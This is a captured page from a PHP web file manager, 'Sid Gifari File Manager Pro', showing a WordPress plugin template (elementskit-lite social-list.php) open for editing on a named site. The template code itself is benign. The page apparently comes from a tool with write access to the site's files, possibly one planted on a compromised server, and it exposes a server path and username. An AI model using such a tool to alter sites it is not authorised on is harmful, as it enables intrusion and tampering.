🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-14 16:25:34 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
digitalsangita.com
/
wp-content
/
plugins
/
elementskit-lite
/
widgets
/
team
/
parts
📍 /home/therahul/digitalsangita.com/wp-content/plugins/elementskit-lite/widgets/team/parts
🔄 Refresh
✏️
Editing: social-list.php
Writable
<ul class="ekit-team-social-list"> <?php foreach ($ekit_team_social_icons as $icon) { ?> <li <?php echo $this->get_render_attribute_string('social_item_' . $icon['_id']); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Already escaped by elementor ?>> <a <?php echo $this->get_render_attribute_string('social_link_' . $icon['_id']); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Already escaped by elementor ?>> <?php \Elementor\Icons_Manager::render_icon( $icon['ekit_team_icons'], [ 'aria-hidden' => 'true' ] ); ?> </a> </li> <?php } ?> </ul>
💾 Save Changes
❌ Cancel